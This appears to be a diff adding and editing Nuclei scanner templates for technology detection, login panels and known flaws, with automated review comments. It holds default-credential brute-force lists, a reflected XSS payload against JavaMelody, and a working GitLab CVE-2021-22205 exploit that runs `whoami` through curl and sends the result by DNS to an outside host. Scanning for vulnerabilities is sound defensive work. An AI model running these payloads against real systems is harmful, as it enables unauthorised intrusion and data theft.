Authorization: Basic {{base64(user + ':' + pass)}}
attack: clusterbomb
payloads:
user:
- admin
- root
pass:
- admin
- 12345
- 123456
- 1234
- 123456789
- 123qwe
- root
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'JMImplementation'
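Review bot: The numeric entries under `pass:` (`12345`, `123456`, `1234`, `123456789`) are unquoted and are therefore parsed as YAML integers, not strings, so the payload value depends on how the loader stringifies numbers and an entry with a leading zero added later would silently change value; quote them, `- "12345"`, as the other string payloads effectively are. With `attack: clusterbomb` over two users and seven passwords this template sends fourteen authentication attempts per target, which is worth stating in a `description:` line since the `info` block has none.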


@ -0,0 +1,46 @@
id: versa-default-login
info:
name: Versa Networks SD-WAN Application Default Login
author: davidmckennirey
severity: high
description: Searches for default admin credentials for the Versa Networks SD-WAN application.
tags: default-login,versa,sdwan
requests:
- raw:
- |
GET /versa/login.html HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
- |
POST /versa/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&sso=systemRadio
attack: pitchfork
payloads:
user:
- Administrator
pass:
- versa123
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 302'
- "contains(tolower(all_headers_2), 'jsessionid')"
- "contains(tolower(all_headers_2), 'location: /versa/index.html')"
condition: and
- type: dsl
dsl:
- "contains(tolower(all_headers_2), '/login?error=true')"
- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true


@ -0,0 +1,33 @@
id: alfresco-detect
info:
name: Alfresco CMS Detection
author: pathtaga
severity: info
tags: alfresco,tech,panel
requests:
- method: GET
path:
- "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'org\/alfresco\/api\/opencmis\/OpenCMIS.get'
- type: word
part: header
words:
- "application/json"
extractors:
- type: regex
part: body
group: 1
regex:
- 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)'
- 'Community v.*([0-9]\.[0-9]+\.[0-9]+)'
- 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)'
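Review bot: The three extractor regexes place a greedy `.*` between the edition marker and the version group (`Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)`), so on a line containing more than one dotted number the capture is the last one rather than the one following `v`; a lazy `Enterprise v.*?([0-9]\.[0-9]+\.[0-9]+)` or, if the version follows `v` directly, `Enterprise v([0-9]\.[0-9]+\.[0-9]+)` pins it. This is a technology detection yet it is tagged `panel`; `tags: alfresco,tech` matches the other detect templates in this commit.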


@ -0,0 +1,28 @@
id: bigbluebutton-login
info:
name: BigBlueButton Login Panel
author: myztique
severity: info
reference: https://github.com/bigbluebutton/greenlight
tags: panel,bigbluebutton
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'content="BigBlueButton'
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Greenlight<\/a>\. (.*)'


@ -0,0 +1,40 @@
id: projectsend-login
info:
name: ProjectSend login panel
author: idealphase
severity: info
reference:
- https://www.exploit-db.com/ghdb/7380
- https://github.com/projectsend/projectsend
metadata:
google-dork: intext:Provided by ProjectSend
tags: panel,projectsend
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'Provided by <a href="https?:\/\/www\.projectsend\.org\/" target="_blank">ProjectSend<\/a>'
- type: word
part: body
words:
- 'id="login_form"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "version (.*) - Free software"


@ -0,0 +1,33 @@
id: strapi-documentation
info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
author: idealphase
severity: info
tags: strapi,panel
requests:
- method: GET
path:
- '{{BaseURL}}/documentation'
- '{{BaseURL}}/documentation/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "x-strapi-config"
- "https://strapi.io/documentation/"
condition: or
- type: word
words:
- "<title>Swagger UI</title>"
- "<title>Login - Documentation</title>"
condition: or
- type: status
status:
- 200
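Review bot: The `name:` field carries a parenthetical remediation sentence, `(Make the documentation endpoint private. By default, the access is public)`, which the other templates in this commit keep out of the title; move it to `remediation: Make the documentation endpoint private; it is public by default.` and shorten the name to something like `Strapi CMS - Documentation Plugin Exposure`. A `description:` line noting that the matcher looks for the plugin's Swagger UI or its login page being reachable would complete the `info` block.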


@ -0,0 +1,20 @@
id: versa-sdwan
info:
name: Versa Networks SD-WAN Application
author: pdteam
severity: info
tags: panel,versa,sdwan
requests:
- method: GET
path:
- "{{BaseURL}}/versa/login.html"
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Versa Networks"


@ -4,7 +4,7 @@ info:
name: AWStats config
author: sheikhrishad
severity: info
tags: config,exposure
tags: config,exposure,awstats
requests:
- method: GET


@ -4,7 +4,7 @@ info:
name: AWStats script
author: sheikhrishad
severity: info
tags: config,exposure
tags: config,exposure,awstats
requests:
- method: GET
@ -20,9 +20,9 @@ requests:
- "Do not remove this line"
- type: word
part: header
words:
- "application/x-perl"
part: header
- type: status
status:


@ -3,7 +3,7 @@ id: open-proxy-portscan
info:
name: Open Proxy to Ports on the Proxy's localhost Interface
author: sullo
severity: High
severity: high
tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to its internal interface
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
@ -56,7 +56,9 @@ requests:
- type: dsl
condition: or
dsl:
- (!regex("(?i)FTP",body_1)) && (!regex("(?i)FTP",body_2)) && (regex("(?i)FTP\b",body_3))
- (!regex("(?i)SSH-[\d.]+-\w+",body_1)) && (!regex("(?i)SSH-[\d.]+-\w+",body_2)) && (regex("(?i)SSH-[\d.]+-\w+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3\b",body_6))
- (!regex("(?i)FTP",body_1)) && (!regex("(?i)FTP",body_2)) && (regex("(?i)FTP",body_3))
- (!regex("(?i)SSH-[.]+-+",body_1)) && (!regex("(?i)SSH-[.]+-+",body_2)) && (regex("(?i)SSH-[.]+-+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# Updated by Chris on 2022/01/21
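Review bot: Of the two variants of the SSH DSL line shown in the second hunk, `SSH-[.]+-+` cannot match a real banner (`[.]+` matches only literal dots and `-+` only hyphens), and `FTP`/`POP3` without `\b` lose the word boundary the other variant has; the rendered page drops the side markers, so if `SSH-[.]+-+` is the new side the `\d` and `\w` escapes appear to have been stripped in editing and `SSH-[\d.]+-\w+` should be restored, and if it is the old side the change is a genuine fix. Either way the three lines deserve a second look before merge, since the template reports a result only when one of these regexes matches. The context line `remediation: Disable the proxy or restrict configuraiton ...` has a typo (`configuration`) that could be fixed while this file is being touched.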


@ -1,10 +1,10 @@
id: unauthenticated-zippkin
id: unauthenticated-zipkin
info:
name: Unauthenticated Zippkin
name: Unauthenticated Zipkin
author: dhiyaneshDk
severity: high
description: Unauthenticated access to Zippkin
description: Unauthenticated access to Zipkin
tags: unauth
requests:


@ -0,0 +1,25 @@
id: airtame-device-detect
info:
name: Airtame Device Detect
author: princechaddha
severity: info
tags: tech,airtame,iot
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "To access the settings of your Airtame"
- "https://airtame.com/download"
condition: and
- type: status
status:
- 200


@ -0,0 +1,35 @@
id: gnuboard-detect
info:
name: Gnuboard CMS Detect
author: gy741
severity: info
description: Detects Gnuboard CMS
reference: https://sir.kr/
tags: tech,gnuboard
requests:
- method: GET
path:
- "{{BaseURL}}/LICENSE.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'GNU Board'
- 'http://sir.kr'
condition: and
- type: word
part: header
words:
- 'text/plain'
extractors:
- type: regex
part: body
group: 1
regex:
- '\( GNU Board (.*) \)'


@ -0,0 +1,24 @@
id: interactsh-server
info:
name: Interactsh Server
author: pdteam
severity: info
tags: tech,interactsh
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<h1> Interactsh Server </h1>"
extractors:
- type: regex
group: 1
regex:
- '<b>(.*)<\/b> server'
- 'from <b>(.*)<\/b>'


@ -0,0 +1,30 @@
id: lexmark-detect
info:
name: Lexmark Device Detect
author: princechaddha
severity: info
tags: tech,airtame,printer
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<title>Lexmark (.*)</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>Lexmark (.*)</title>"
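Review bot: The `airtame` tag on this Lexmark detector looks copied from the Airtame template added in the same commit and will pull it into `-tags airtame` runs while leaving it out of any `lexmark` selection. The tags line should name the product it detects: `tags: tech,lexmark,printer`. The greedy `(.*)` in the title regex is fine here because `.` does not cross a newline, so the extracted model string stays on the title line.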


@ -0,0 +1,35 @@
id: projectsend-detect
info:
name: ProjectSend Detect
author: idealphase
severity: info
reference:
- https://www.exploit-db.com/ghdb/7380
- https://github.com/projectsend/projectsend
metadata:
google-dork: intext:Provided by ProjectSend
tags: tech,projectsend
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'Provided by <a href="https?:\/\/www\.projectsend\.org\/" target="_blank">ProjectSend<\/a>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "version (.*) - Free software"


@ -0,0 +1,63 @@
id: gitlab-rce
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce,oast,intrusive
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
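Review bot: The `csrf-token` extractor depends on the exact bytes `" />\n\n<meta` following the meta tag, so any change in GitLab's sign-in markup leaves `{{csrf-token}}` unexpanded and the upload is rejected before it reaches the image parser, producing a false negative on a vulnerable host; matching the attribute value alone, `- 'csrf-token" content="([^"]+)"'`, is enough and survives layout changes. The second request runs `curl `whoami`.{{interactsh-url}}` on the target, so the local username leaves the host in a cleartext DNS query to the interactsh server, and a host without `curl` will be exploited yet reported clean; a comment above `cookie-reuse` such as `# Executes curl + whoami on the target; result exfiltrated via DNS to interactsh` documents both. The CVE templates elsewhere in this tree use the CVE as the id (e.g. `id: CVE-2009-5020`), so `id: gitlab-rce` with `cve-id: CVE-2021-22205` breaks that convention.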


@ -0,0 +1,31 @@
id: java-melody-xss
info:
name: JavaMelody Monitoring XSS
author: kailashbohara
severity: medium
description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
reference:
- https://github.com/Hurdano/JavaMelody-XSS
- https://github.com/javamelody/javamelody/pull/555
tags: xss,javamelody
requests:
- method: GET
path:
- '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200